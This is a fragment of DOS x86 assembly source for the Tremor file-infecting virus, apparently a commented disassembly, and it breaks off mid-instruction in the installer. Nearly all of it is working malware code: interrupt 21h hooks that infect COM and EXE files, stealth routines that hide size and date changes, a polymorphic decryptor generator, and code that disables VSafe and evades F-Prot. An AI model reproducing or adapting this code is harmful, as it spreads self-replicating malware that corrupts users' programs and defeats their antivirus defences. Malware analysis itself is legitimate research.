es:[bx.date+1],al ; + jb goback ; not infected + sub byte ptr es:[bx.date+1],al ; else "des"-infect + + mov si,1ah ; now : check size + +loc_32: cmp byte ptr es:[bx+si+2],0 ; low-byte of high-word + jne loc_33 ; always strip off + ; virussize between + ; 64kb and 1mb ?!? + + cmp word ptr es:[bx+si ],8192 ; minsize to infect + jb goback + +loc_33: sub word ptr es:[bx+si ],4000 ; vir-size.. + sbb word ptr es:[bx+si+2],0 + +goback: call trem_popall + pop ax +loc_35: popf + +backtocaller: retf 2 ; end of int 21h....... +;------------------------------------------------------------------- +; findfirst / findnext / fcb +;------------------------------------------------------------------- +loc_37: cmp ah,11h + jb xcreate + cmp ah,12h + ja xcreate + + call performint21 + pushf + push ax + cmp al,0ffh ; error + je goback + + call getdta ; al=c8 + cmp byte ptr es:[bx],0ffh ; extended fcb.. + jne loc_38 + add bx,7 +loc_38: cmp byte ptr es:[bx+1ah],al ; f-attribut..... + jb goback + sub byte ptr es:[bx+1ah],al ; stealth it + mov si,1dh + jmp loc_32 +;------------------------------------------------------------------- +; extended open / create / replace +;------------------------------------------------------------------- +xcreate: cmp ah,6ch + jne chkifopen + mov dx,si + jmp hopenfile +;------------------------------------------------------------------- +; open file / get handle +;------------------------------------------------------------------- +chkifopen: cmp ah,3dh + jne chkifclose + +hopenfile: inc word ptr cs:[random_1] + cmp al,2 ; open r/w ? + jne chkifclose + +des_infect_it: call clean__file ; ! interesting + jmp loc_50 +;------------------------------------------------------------------- +; close file / release handle +;------------------------------------------------------------------- +chkifclose: cmp ah,3eh + jne checkiftimestamp + + call performint21 ; perform close file + pushf + push ax ; result + jc readfhdone ; error -> nothing else to do + + call getflag_cs_00 ; get flag + cmp bl,al ; bl was filehandle + jne readfhdone + + call setflag_cs_00 ; al to flagpos + push cs + pop ds + mov dx,2 + call do_infect +readfhdone: jmp goback +;------------------------------------------------------------------- +; get/set files datetime +;------------------------------------------------------------------- +checkiftimestamp: + cmp ah,57h + jne call_checkfortremor + + cmp al,1 ; set timestamp + je issettime + + call trem_popall ; get timestamp........ + call performint21 + pushf + jc return2caller + cmp dh,200 + jb return2caller + sub dh,200 +return2caller: jmp loc_35 + +issettime: cmp dh,200 + jb isnot2000 + sub byte ptr cs:[old__dx],200 +isnot2000: call readfirstbytes + jc loc_50 + call seekbeginoffile + call infect_file + jc loc_50 + call sub_17 + call trem_popall + add dh,200 + call performint21 + pushf + sub dh,200 + jmp return2caller + +call_checkfortremor: + call checkfortremor +;------------------------------------------------------------------- +; programm-ende +;------------------------------------------------------------------- + cmp ah,4ch + jne loc_51 + ; + mov cs:[offset enablehandle],0 + mov cs:[offset disablhndchk],offset chkflhandl-offset disablhndchk+1 + ; +loc_50: jmp loc_55 +;------------------------------------------------------------------- +; exec +;------------------------------------------------------------------- +loc_51: cmp ah,4bh + je loc_52 + jmp loc_60 + +loc_52: call setflag_cs_00 ; al->cs:00 + cmp al,0 ; exec or load ovl ? + je loc_53 ; = 0 -> exec + jmp des_infect_it + +loc_53: db 0ebh +watchfiles db 0 + + mov dx,-paras_needed ; 10ch + call GetTremMem; setzt 29dh auf 0 + + push cs + pop ds + + mov ds:[watchfiles ],offset loc_0053-offset loc_53+2 + mov ds:[enablegetmem],offset loc_31-offset loc_28+2 + mov ds:[enablehandle],0 + ; +loc_0053: call getorigregs + + call findfile ; + jc loc_55 + + cmp byte ptr cs:[tempdta],3 ; drive c: ? + jb loc_55 ; no, floppy + + mov ax,word ptr cs:[tempdta.fname] + cmp ax,4248h ; "HB"scan + je loc_54 + cmp ax,4c43h ; "CL"ean + je loc_54 + cmp ax,4353h ; "SC"an + jne loc_56 + +loc_54: call getorigregs + call clean__file ; !! + call setflag_cs_00 ; flag = -1 +loc_55: jmp chaintoint21 + +loc_56: push cs + pop es + mov di,offset specialfiles + mov cx,8 ; 8 filenames + cld + repne scasw + jnz loc_58 + + cmp ax,4843h ; "CH" + jne loc_57 + cmp word ptr cs:[tempdta.fname+2],444bh; "KD" + jne loc_57 ;------------------------ + ; else : chkdsk running ! + ;------------------------ + + mov byte ptr cs:[enablehandle],offset xcreate-offset loc_31+2 + +loc_57: call getrealmemorysize + mov byte ptr cs:[watchfiles],0 +loc_58: cmp word ptr cs:[tempdta.fname+1],4a52h; "RJ" + jne loc_59 + + mov byte ptr cs:[disablhndchk],offset handlefkts-offset disablhndchk+1 + + +loc_59: call getorigregs + jmp loc_61 +;------------------------------------------------------------------- +; get / set file-attribut +;------------------------------------------------------------------- +loc_60: cmp ah,43h + jne chaintoint21 ; + or al,al ; is it "get" + jnz loc_62 ; no -> jmp + ; + cmp bx,0faceh ; is it tremor who calls ? + jne chaintoint21 ; no -> jmp + ;--------------------------------------------------- +loc_61: call checkif_com_file; zf = com-file + jnz loc_62 + mov al,1 + call set_com_flag + +loc_62: call getorigregs + call do_infect + +chaintoint21: call trem_popall + + cmp word ptr cs:[offset my_call],ax + jne toold21 +org_487 equ $+2 + mov ax,word ptr cs:[random_1] + iret + +toold21: jmp dword ptr cs:[internal_21] +;-------------------------------------------------------------------------- +; virus-s : +;-------------------------------------------------------------------------- +; get int in al to dword cs:di +;-------------------------------------------------------------------------- +getint: mov ah,35h + call performint21 + mov cs:[di],bx + mov word ptr cs:[di+2],es + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +resetints: mov al,15h ; set int 15h to cs:tremor_15 + mov di,offset tremor_15 + call setint + mov al,21h ; set int 21h to cs:tremor_21 + mov di,offset tremor_21 + call setint +org4ad equ $+1 + mov bl,81h + call checkforvsafe + mov al,24h ; set int 24h + mov di,offset tremor_24 + +setint: mov dx,cs:[di] + mov bx,word ptr cs:[di+2] + mov ds,bx + +setint1: mov ah,25h ; + +performint21: pushf + call dword ptr cs:[internal_21] + retn +;-------------------------------------------------------------------------- +getdta: mov ax,2fc8h ; set dta + jmp performint21 +;-------------------------------------------------------------------------- +getsetfattr: mov ah,43h ; + jmp performint21 +;-------------------------------------------------------------------------- +getsetfilesdatetime: + mov ah,57h ; get/set filestamp + jmp sethandlecall21 +;-------------------------------------------------------------------------- +read_first_32byte: + mov cx,-1 + mov dx,-32 ; cx:dx = -32 + mov al,2 + call seek ; seek from eof + +read_32: mov ah,3fh + mov cx,20h ; read last 32 byte +setbuff: mov dx,offset buffer; filename/buffer + +tempfhandle equ $+1 + +sethandlecall21:mov bx,5 + jmp performint21 +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +writeexeheader: mov cx,18h +truncate: mov ah,40h ; write to file + jmp setbuff +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +opendestfile: mov bp,dx + mov al,0 + call getsetfattr ; get attr + jc loc_ret_72 + mov word ptr cs:[origfattr],cx + test cl,3 ; r/o or hidden ? + jz loc_71 ; no, jmp + mov al,1 + xor cx,cx ; set attr to "none" + call getsetfattr ; set attr + jc loc_ret_72 + +loc_71: mov ax,3d92h ; open file + call performint21 + jc loc_ret_72 + + mov word ptr cs:[tempfhandle],ax + mov al,0 ; get + call getsetfilesdatetime + mov word ptr cs:[origfdate],dx + mov word ptr cs:[origftime],cx +loc_ret_72: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +readfirstbytes: mov word ptr cs:[tempfhandle],bx +read32byte: mov al,1 + call seekinfile ; seek from current position + jc loc_74 + push ax + push dx + push ds + + push cs + pop ds + + mov word ptr ds:[filesize ],ax ; + mov word ptr ds:[filesize+2],dx + + call read_first_32byte ; buffer = ds:104dh + pop ds + pop cx + pop dx + jc loc_73 + cmp ax,20h ; read 32 byte ok ? + jne loc_73 + +seekstartoffile:mov al,0 ; ok. seek begin of file ! + jmp seek ; and return ! + +loc_73: call seekstartoffile ; and 2*return +loc_74: stc + retn + +sub_17: mov al,0 + +filesize equ $+1 + mov dx,0 ; dummy-code to save + mov cx,0 ; data (filesize). +seekbeginoffile: + xor ax,ax +seekinfile: xor cx,cx + mov dx,cx +seek: mov ah,42h ; seek + jmp sethandlecall21 +;-------------------------------------------------------------------------- +setinfectdate: mov al,1 ; set files date-time +origfdate equ $+1 + mov dx,0deafh +origftime equ $+1 + mov cx,2800h + call getsetfilesdatetime + mov ah,3eh ; close file + call sethandlecall21 + + call getorigregs +origfattr equ $+1 + mov cx,20h + mov al,1 + jmp getsetfattr +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +checkif_com_file: + mov di,dx + mov cx,80 + mov al,'.' ; serach for "." + push ds + pop es + cld + repne scasb + jnz loc_ret_78 + mov ax,[di] + or ax,6060h ; 4f43h or 6060h => 6f63h + cmp ax,6f63h ; 4f43h = "co" +loc_ret_78: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +do_infect: call checkforfprot + jz loc_82 + call opendestfile + jnc loc_79 ; no error -> jmp + cmp al,3 ; error = file not found ? + ja loc_80 ; yes -> return + retn + +loc_79: call readheader + jnc loc_80 + call add200toyear + call infect_file + +loc_80: jmp setinfectdate + +dontinfect: sub byte ptr cs:[1+origfdate],200 +loc_82: stc + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +infect_file: call checkifinfected + jz loc_82 + push cs + pop ds + call read_32 + jc dontinfect + + mov si,offset buffer + call test_com_flag + jnz loc_83 + + cmp byte ptr [si],0e9h ; long jmp + je loc_84 + mov al,0 + call set_com_flag + +loc_83: cmp word ptr [si],5a4dh ; 'MZ' + jne dontinfect + cmp word ptr ds:[si+18h],40h; start of reloc-table + je dontinfect ; 40h => *.dll ! + ; it doesnt try to infect + ; windows and os/2-software + +loc_84: mov ax,ds:[si+10h] ; sp-init + cmp ax,2f0h ; + je dontinfect + + cmp ax,510h + jb loc_85 + + cmp ax,522h + jb dontinfect + +loc_85: call test_com_flag + jnz loc_86 ; ??! +loc_86: mov word ptr ds:[init_sp],ax + + mov ax,ds:[si+14h] ; get init-ip + call test_com_flag + jnz loc_87 + mov ax,ds:[si+1] + mov word ptr ds:[init_jump],ax + mov ax,100h +loc_87: mov word ptr ds:[init_ip],ax + call test_com_flag + jz loc_88 + + mov ax,word ptr ds:[si+4] ; nr of 512-pages + cmp ax,10h + jb dontinfect + dec ax + mov dx,512 + mul dx + add ax,word ptr ds:[si+2] ; add rest of file + adc dx,0 + push ax ; files size (without overlays !!) + push dx + +loc_88: mov al,2 + call seekinfile ; seek from eof + + mov ds:[si+18h],ax ; low filesize -> reloc-entry + mov ds:[si+1ah],dx ; high filesize + + call test_com_flag + jnz loc_90 + + or dx,dx ; file > 64kb (its a com-file !) + jnz skip_file + cmp ah,0d6h ; file > 54784 byte + ja skip_file + cmp ah,20h + jb skip_file ; file < 8192 byte + mov di,ax + sub di,3 + jmp loc_91 + +skip_file: jmp dontinfect + +loc_90: pop bp ; file-size + pop di + cmp ax,di + jne skip_file + cmp dx,bp + jne skip_file + cmp dx,0fh ; > 968kb ! + ja skip_file + + mov di,ax + and di,0fh ; filesize mod 15 +loc_91: mov word ptr ds:[org_895],di + push di + mov cl,4 + shr ax,cl + ror dx,cl + add ax,dx + sub ax,ds:[si+8] + push ax + push ax + push ax + add ax,di + push ax + mov ah,2ah ; get system-date + call performint21 + + add dh,3 + cmp dh,0dh + jb loc_92 + sub dh,0ch + inc cx + +loc_92: mov word ptr ds:[org_ceeh],cx + mov word ptr ds:[org_ce8h],dx + mov ah,2ch + call performint21 ; get system-time + pop ax + add ax,cx + add ax,dx + neg ax + mov word ptr ds:[si+1ch],0deadh ;-) + mov word ptr ds:[si+1eh],ax + xor ax,0deafh + mov word ptr ds:[org_7e6],ax + mov word ptr ds:data_0109,ax + + call sub_29 + + mov word ptr ds:[org_8ee],ax + mov word ptr ds:[org_8df],bx + pop ax + sub ax,bx + sub ax,ds:[si+16h] + mov word ptr ds:[init_cs],ax + pop ax + sub ax,bx + sub ax,word ptr ds:[si+0eh] + mov word ptr ds:[init_ss],ax + shl bx,1 + mov word ptr ds:[org_883],bx + cld + + push si + push cs + pop es + ;--------------------------------------------------- + ; codemachine starts + ;--------------------------------------------------- + mov si,offset data_x01 + mov di,si + push si + lodsw ; data_x01:data_x02 -> bx:ax + xchg ax,bx + lodsw + xchg al,ah ; bx:ax=bhblahal -> bhblalah + xchg bl,bh ; blbhalah + xchg ah,bl ; ahbhalbl + xchg ax,bx ; bhahblal + stosw ;data_x01:data_x02 <- ax:bx + xchg ax,bx + stosw + ;--------------------------------------------------- + mov ah,2ch ; get sys-time + call performint21 + mov bp,cx + add bp,dx + mov bx,cx + mov cl,4 + shl bl,cl + and dh,0fh + or dh,bl + mov dl,bh + shl dl,cl + push dx + mov ah,2ah ; get sys-date + call performint21 + add bp,dx + neg bp + mov cx,dx + pop dx + or dl,al + mov di,offset extra + mov ax,bp + call sub_29 + mov word ptr ds:[org_8f5],ax + mov word ptr ds:[org_8a5],ax + mov word ptr ds:[org_8e6],bx + mov bx,word ptr ds:[random_1] + pop si + ;-----------------------------------( code-generator)--- + test dl,1 + jz loc_94 + mov al,26h ; es: + test ch,2 ; cx !=10.0000b = es: + jz loc_93 + mov al,6 ; push es + stosb + mov al,1fh ; pop ds +loc_93: stosb + +loc_94: lodsb + call sub_30 + lodsb + call sub_30 + lodsb + call sub_30 + lodsb + call sub_30 + + test dl,1 + jnz loc_97 + test bl,15h + jnz loc_95 + mov ax,71eh + stosw + jmp loc_97 + +loc_95: mov al,0f2h ; repnz + test ch,1 + jz loc_96 + inc ax ; repz +loc_96: stosb +loc_97: push di + sub si,4 + call test_com_flag + jz loc_98 + mov al,36h ; ss: + stosb +loc_98: mov al,31h + mov byte ptr ds:data_103,al ; xor [di],al + test dh,40h + jz loc_99 + mov byte ptr ds:data_103,1 ; add [di],ax + mov al,29h +loc_99: mov byte ptr ds:[org_1081],al ; sub [di],al + stosb + mov al,1ch ; sbb reg8bit,abs + test dh,2 + jz loc_100 + inc al ; sbb reg16bit,abs +loc_100: test cl,3 + jz loc_101 + sub al,8 ; adc reg16bit,abs +loc_101: stosb + call sub_32 + test bl,1 + jz loc_102 + call insertnearjmp + +loc_102: mov byte ptr ds:data_0108,5 ; add ax,xxxx + cmp ch,0ah + jb loc_103 + test cl,3 + jnz loc_103 + mov ax,5f8dh + stosw + xor ax,ax + mov al,bl + or al,40h + cbw + mov word ptr ds:data_0109,ax ; add ax,xxxx + stosb + jmp loc_106 + +loc_103: mov al,81h + stosb + mov al,0c3h + test cl,3 + jz loc_104 + dec ax +loc_104: test dl,2 + jz loc_105 + add al,30h + mov byte ptr ds:data_0108,35h +loc_105: stosb + +org_7e6 equ $+1 + mov ax,0f6f5h + stosw +loc_106: test bl,1 + jnz loc_107 + call insertnearjmp +loc_107: test dh,3 + jz loc_109 + call sub_32 + + mov al,83h ; sub si,-11 + stosb + mov al,0eeh + test dh,2 ; dh, bit 2 ="1" -> di + jz loc_108 + inc ax ; sub di,-11 +loc_108: stosb + mov al,0feh + stosb + jmp loc_111 + +loc_109: mov al,46h ; inc si + test dh,2 + jz loc_110 + inc ax ; inc di +loc_110: stosb + push ax + call sub_32 + pop ax + stosb +loc_111: call sub_32 + test bl,3 + jnz loc_112 + test dl,10h + jnz loc_112 + cmp ch,3 + ja loc_112 + mov al,0e2h + jmp loc_116 + +loc_112: mov al,49h ; dec cx + test dl,10h ; dl!=1000b = use cx + jz loc_113 ; dl =1000b = use bp + add al,4 ; dec bp +loc_113: test bl,3 + jz loc_114 + sub al,8 ; inc bp / inc cx +loc_114: stosb + call sub_32 + cmp ch,0ah + jb loc_115 + test cl,3 + jz loc_117 +loc_115: test dh,3 + jnz loc_117 + test dl,2 + jz loc_117 + mov al,77h +loc_116: jmp loc_118 + +loc_117: mov al,75h +loc_118: stosb + pop ax + dec ax + sub ax,di + stosb + test di,1 + jnz loc_120 + mov al,bl + and al,7 + or al,90h + cmp al,94h + jne loc_119 + inc ax +loc_119: stosb +loc_120: mov ax,0edh + sub ax,di + shr ax,1 + add ax,7b0h + mov ds:data_x02,ax +org_883 equ $+1 + add ax,0deh + test bl,3 + jz loc_121 + neg ax +org_88d equ $+1 +loc_121: mov word ptr ds:[init_bx],ax + mov ax,di + mov ds:data_x01,ax +org_895 equ $+1 + add ax,0c36ch + sub ax,offset extra + call test_com_flag + jnz loc_122 + add ax,103h + jmp loc_123 + +org_8a5 equ $+1 +loc_122: add ax,4f0h +org_8a8 equ $+1 +loc_123: mov word ptr ds:[extra+1],ax + + mov al,0e9h + stosb +len_of_jmp equ $+1 + mov ax,0cd5h + sub ax,di + stosw + pop si + call scramblebuffer + + mov al,2 + call seekinfile + call sub_58 + jnc loc_125 + +loc_124: pop ax + pop ax + jmp dontinfect + +loc_125: cmp ax,cx + jne loc_124 + call seekbeginoffile + call scramblebuffer + call test_com_flag + jnz buildexeheader + pop ax + pop ax + mov ds:[si+1],ax + jmp loc_127 + + +buildexeheader: pop ax + push ax +org_8df equ $+1 + sub ax,006fh + mov ds:[si+16h],ax ; cs_init + pop ax +org_8e6 equ $+1 + sub ax,004fh + mov ds:[si+0eh],ax ; ss_init + pop ax + push ax +org_8ee equ $+1 + add ax,06f0h + mov ds:[si+14h],ax ; ip_init + + pop ax +org_8f5 equ $+1 + add ax,04f0h ; = 1264 dec + ; + add ax,1080h ; = 4224 dec, sum=5488 dec + mov ds:[si+10h],ax ; sp_init + + mov ax,word ptr ds:[si+2] ; get lastbytes + add ax,4000 + cwd ; = xor dx,dx + mov bx,200h + div bx + add word ptr ds:[si+4],ax ; nr of pages + mov word ptr ds:[si+2],dx ; lastbytes +loc_127: jmp writeexeheader +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +readheader: call read32byte +chkdate200: mov al,byte ptr cs:[origfdate+1] + mov ah,200 + cmp al,ah + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +add200toyear: add al,ah + mov byte ptr cs:[origfdate+1],al + retn +;-------------------------------------------------------------------------- +test_com_flag: cmp byte ptr cs:[com_flag],1 + retn +;-------------------------------------------------------------------------- +set_com_flag: mov byte ptr cs:[com_flag],al + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +sub_29: mov cl,4 ; ax = 1234h -> ax=0230h + and ax,0ff0h ; bx=0023h + mov bx,ax ; cl=4 + shr bx,cl + retn +;-------------------------------------------------------------------------- +; code-generator +; +; oh god ! +; why does somebody, that can write such a machine, waste his time +; writing the virus around ?? i'll never understand it. +; +;-------------------------------------------------------------------------- +sub_30 proc near + push ax + mov ah,bl + and ah,3 + cmp al,ah + jne loc_130 + test dl,1 + jz loc_128 + mov al,85h ; test + jmp loc_129 + +loc_128: mov al,23h + test cl,2 + jz loc_129 + mov al,0bh ; or + +loc_129: mov ah,0c0h + stosb + mov al,bl + and al,7 + add al,ah + stosb +loc_130: pop ax + cmp al,3 + je loc_ret_139 + cmp al,2 + je loc_136 + cmp al,1 + je loc_133 + call test_com_flag + jz loc_131 + cmp bl,6 + ja loc_131 + mov al,8dh + stosb + mov al,1eh + test cl,3 + jz loc_132 + mov al,16h + jmp loc_132 +loc_131: mov al,0bbh + test cl,3 + jz loc_132 + dec ax +loc_132: stosb + mov ax,bp + mov word ptr ds:init_ip,ax + stosw + retn + +loc_133: call test_com_flag + jz loc_134 + + cmp bl,0fch + jb loc_134 + + mov al,8dh ; 8d 36 -> lea si,offset + stosb + mov al,36h + test dh,2 + jz loc_135 + mov al,3eh ; 8d 3e -> lea di,offset + jmp loc_135 + +loc_134: mov al,0beh ; 8d be -> lea di,[bp+...] + test dh,2 + jz loc_135 + inc ax ; 8d bf -> lea di,[bx+...] +loc_135: stosb + mov word ptr ds:[org_8a8],di + stosw + retn + +loc_136: call test_com_flag + jz loc_137 + test bh,5 + jz loc_137 + mov al,8dh ; 8d 0e -> lea,cx,[xxxx] + stosb + mov al,0eh ; + test dl,10h + jz loc_138 + mov al,2eh ; 8d 2e -> lea bp,[xxxx] + jmp loc_138 + +loc_137: mov al,0b9h ; mov al,"mov cx,xxxx" + test dl,10h + jz loc_138 + mov al,0bdh ; mov al,"mov bp,xxxx" +loc_138: stosb + mov word ptr ds:[org_88d],di + stosw + +loc_ret_139: retn +sub_30 endp +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +insertnearjmp: test ch,3 + jnz loc_ret_140 + xor ax,ax + mov al,bl + and al,7 + add al,78h ; 78..7f -> near jmp + stosw +loc_ret_140: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +sub_32: lodsb + test ch,2 + jz loc_143 + cmp al,1 + jne loc_ret_142 + mov al,0fch ; mov al,'cld' + test dh,80h + jz loc_141 + dec ax ; mov al,'sti" +loc_141: stosb +loc_ret_142: retn + +loc_143: cmp al,3 + jne loc_ret_142 + mov al,90h ; mov al, "nop" + test dh,80h + jz loc_144 + mov al,2eh ; mov al,"cs:" +loc_144: stosb + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +findfile proc near + push dx + push ds + push es + push bx + + mov ah,2fh ; get dta + call performint21 + push bx + push es ; es:bx = dta + + push ds ; ds:dx remains constant + push dx + + mov ah,1ah + push cs + pop ds + mov dx,offset tempdta ; set dta + call performint21 + + pop dx ; + pop ds + mov cx,27h ; anyfile + mov ax,4e00h ; find first + call performint21 + pop ds + pop dx + + pushf + mov al,byte ptr cs:[tempdta.date+1] + mov ah,1ah ; re-set dta + call performint21 + popf + + pop bx + pop es + pop ds + pop dx + retn +findfile endp +;-------------------------------------------------------------------------- +; desinfecting open files +;-------------------------------------------------------------------------- +clean__file: call checkforfprot + jz loc_145 + call findfile + jc loc_145 + + cmp al,200 ; = hibyte of files date + jb loc_145 + + call opendestfile + jnc loc_146 ; no err -> jmp + cmp al,3 ; error = file not found ? + ja loc_149 ; no -> jmp +loc_145: stc ; else return + retn + +loc_146: call chkdate200 + jc loc_149 + call readheader + jc loc_147 + neg ah + call add200toyear ; but here : "sub".. + +loc_147: call checkifinfected + jnz loc_149 + + push ds + push es + ; + push cs + pop es + mov si,bp + mov di,2 + call getflag_cs_00 + cmp al,0ffh + jne loc_148 + + mov ah,60h ; get truename + call performint21 ; to es:di + mov word ptr es:[di-2],bx + +loc_148: pop es + pop ds + call desinfect +loc_149: jmp setinfectdate +;-------------------------------------------------------------------------- +; desinfect physically +;-------------------------------------------------------------------------- +desinfect: push cs + pop ds + call writeexeheader + mov dx,word ptr ds:[data_x01] + mov cx,word ptr ds:[data_x02] + mov al,0 ; seek from begin of file + call seek ; to filepos cx:dx + xor cx,cx + jmp truncate ; write 0 byte -> truncate tremor +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +checkifinfected:call scramblebuffer + cmp word ptr cs:[1ch+si],0deadh + jne loc_ret_150 ; back with nz ! + cmp byte ptr cs:[si],0e9h + je loc_ret_150 + cmp word ptr cs:[si],5a4dh +loc_ret_150: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +scramblebuffer: mov si,offset buffer + push si + mov ax,cs:[si+1eh] +loc_151: xor cs:[si],ax + add ax,913fh + inc si + inc si + cmp si,106bh + jne loc_151 + pop si + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +setflag_cs_00: mov byte ptr cs:[flag],0ffh + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +getflag_cs_00: mov al,cs:[flag] + retn +;-------------------------------------------------------------------------- +; out : real mem-top +;-------------------------------------------------------------------------- +getrealmemorysize: + mov dx,paras_needed ; dx = 10ch +GetTremMem: + nop ; dx = - 10ch + mov byte ptr cs:[enablegetmem],0 ; enable mem-handler + mov ah,52h + call performint21 + call getfrstmcb +loc_152: cmp byte ptr [di],5ah + je lastmcbfound + push ds + pop es + call getnextmcb + jmp loc_152 +lastmcbfound: add ds:[di+3],dx ; = add / sub 10ch + retn +;-------------------------------------------------------------------------- +; out : ds = seg of next mcb in chain +;-------------------------------------------------------------------------- +getnextmcb: mov ax,ds + inc ax + add ax,ds:[di+3] + mov ds,ax + retn +;-------------------------------------------------------------------------- +; out : es=dos-segment and ds:si = first mcb +;-------------------------------------------------------------------------- +get_1stmcb: mov ah,52h + int 21h +getfrstmcb: lds di,dword ptr es:[bx-4] ; get first mcb + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +chkfilesize: cmp dx,word ptr cs:[data_x02] + jne loc_ret_154 + cmp bx,word ptr cs:[data_x01] +loc_ret_154: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +checkforfprot: mov byte ptr cs:[BP_Flag],1 + mov ax,0ff0fh + pushf + call dword ptr cs:[tremor_21] + cmp ax,101h + mov byte ptr cs:[BP_Flag],0 + retn +;-------------------------------------------------------------------------- +;int 13 - pc tools v8+ vsafe, vwatch - api +; ah = fah +; dx = 5945h +; al = function (00h-07h) +;return: varies by function +;-------------------------------------------------------------------------- +checkforvsafe: mov ax,0fa02h ; switch it off + mov dx,5945h + int 13h + retn +;---------------------------------------------------------------------- +message1: db "-=> t.r.e.m.o.r was done by neurobasher /" + db " may-june'92, germany <=-",0 +message2: db ".moment.of.terror.is.the.beginning.of.life.",0 +;---------------------------------------------------------------------- +newint15: push ax + in al,60h + cmp al,53h ; del-key pressed + jnz no_del_key ; no->bye + + push ds + mov ax,40h + mov ds,ax + mov al,byte ptr ds:[17h] + test al,1100b ; ctrl+alt pressed ? + jz bye_int09 + + push bx + push cx + push dx + push si + mov ax,700h + xor bx,bx + mov cx,bx + mov dx,187fh + int 10h + mov ah,02 + mov dx,907h ; set cursor + int 10h + mov si,offset message1 + call print_message + mov dx,0f13h + int 10h + mov si,offset message2 + call print_message + mov cx,96h +locloop_155: push cx + mov cx,0ffffh + +locloop_156: jmp $+2 + loop locloop_156 + + pop cx + loop locloop_155 + + pop si + pop dx + pop cx + pop bx + +bye_int09: pop ds +no_del_key: pop ax + cli + jmp dword ptr cs:[internal_15] + ;-------------------------------- + +print_message: mov al,cs:[si] + xor al,9ch + cmp al,0 + je loc_ret_160 + int 29h + inc si + jnz print_message +loc_ret_160: retn +;-------------------------------------------------------------------------- +; reset ints + registers. +;-------------------------------------------------------------------------- +trem_popall: cli + call resetints + +getorigregs: mov ax,03c4h + mov ds,ax + mov ax,9ef5h + mov es,ax + mov ax,4300h + mov bx,0faceh + mov cx,1989h + mov dx,000eh + db 0beh ; mov si,xxxx +old__si dw 11b7h + mov di,008ah + mov bp,0070h + sti + retn +flickerflag equ $+1 +random_1 dw 0 +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +checkfortremor: xor bx,bx + mov ds,bx + lds si,dword ptr ds:[4+bx] ; int 01 starts with iret ? + cmp byte ptr [si],0cfh + jne loc_162 ; no -> jmp + + cmp ah,30h ; + jne loc_164 + push cx ; save cx,dx + push dx + mov ah,2ah ; get system-date + call performint21 + pop bx + pop bp + mov ax,offset random_1 ; compare cx,dx to sys-dat + cmp bp,cx ; tremor first calls sys-date + jne loc_163 ; then dos-version. + cmp bx,dx ; -- extended self-check. + jne loc_163 + +loc_162: mov ax,offset selftest +loc_163: mov word ptr cs:[org_487],ax +loc_164: jmp getorigregs +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +newint01: push ax + push bx + push si + call reloc_int1 +reloc_int1: pop si ; si = offset reloc_int1 + mov bx,sp + mov ax,ss:[bx+8] ; callerseg +Dos_Seg equ $+1 + cmp ax,129h + ja loc_165 + + mov cs:[si+offset trace_result-offset reloc_int1+2],ax + mov ax,ss:[bx+6] ; caller-offset + mov cs:[si+offset trace_result-offset reloc_int1 ],ax + and byte ptr ss:[bx+0bh],0feh; reset tf + jmp loc_166 + +loc_165: push cs + pop ax + cmp ax,ss:[bx+8] ; first steps + je loc_166 ; or end of int + + mov ax,ss:[bx+8] + mov cs:[si+offset tracetemp-offset reloc_int1+2],ax + mov ax,ss:[bx+6] + mov cs:[si+offset tracetemp-offset reloc_int1 ],ax + +loc_166: pop si + pop bx + pop ax + iret +;------------------------------------------------------------------------ + ; +SpecialFiles db 'CH' +Trace_Result db 'ME','MI' + db 'F2','F-' +Tracetemp db 'SY','SI' + db 'PM' + ; chkdsk + ; mem + ; mirror + ; f-prot + ; sys + ; si + ; + ; unused : + ; + db 'RJ','KZ','AH' ; ARJ,PKZIP,LHA + +AnyFile db '\*.*',0 +BP_Flag dw 0 ; + dw 0 + db 0,0,0 +;------------------------------------------------------------------- +; installation +;------------------------------------------------------------------- +virinstall: call cda +cda: pop si + mov ah,2ah ; get current date + mov word ptr cs:[si+offset start_psp-offset cda],es + int 21h + mov al,72h ; "jb" +org_ce8h equ $+2 + ;--------------------------------------------------- + cmp dx,504h ; now : 4. mai ? + jb loc_168 ; previous -> jmp + ;--------------------------------------------------- +org_ceeh equ $+2 + ;--------------------------------------------------- + cmp cx,7c9h ; 1993 ? +org_cf0 equ $ + jae loc_169 ; after -> jmp + ;--------------------------------------------------- +loc_168: mov al,0ebh ; "jmp"-> disable psycho... + ; +loc_169: mov cs:[si+offset psycholabel-offset cda],al + ; + mov ah,30h + cld + int 21h + xchg al,ah + cmp ax,31dh ; dosversion < 3.30 -> stop + ja loc_171 +loc_170: jmp vir_install_done + +my_call equ $+1 +loc_171: mov ax,0f1e9h ; "tremor" + int 21h + +selftest equ $+1 + cmp ax,0cadeh + je loc_170 + + xor di,di ; di=0 + mov ax,40h + mov ds,ax + mov bp,ds:[di+13h] ; get max-memory + mov cl,6 + shl bp,cl ; bp = top of memory + mov ah,62h ; + int 21h ; get psp + mov ds,bx ; + push word ptr ds:[di+2ch] ; push env-seg + push ds ; ds = psp-segment + ; + mov cl,90h ; mov cl,"nop" +;--------------------------------------------------------------= + mov ax,5800h ; get mem strategy + int 21h ; + xor ah,ah ; + push ax + mov ax,5801h ; set it to "give umb first" + mov bx,80h + int 21h + mov ax,5802h ; get mem 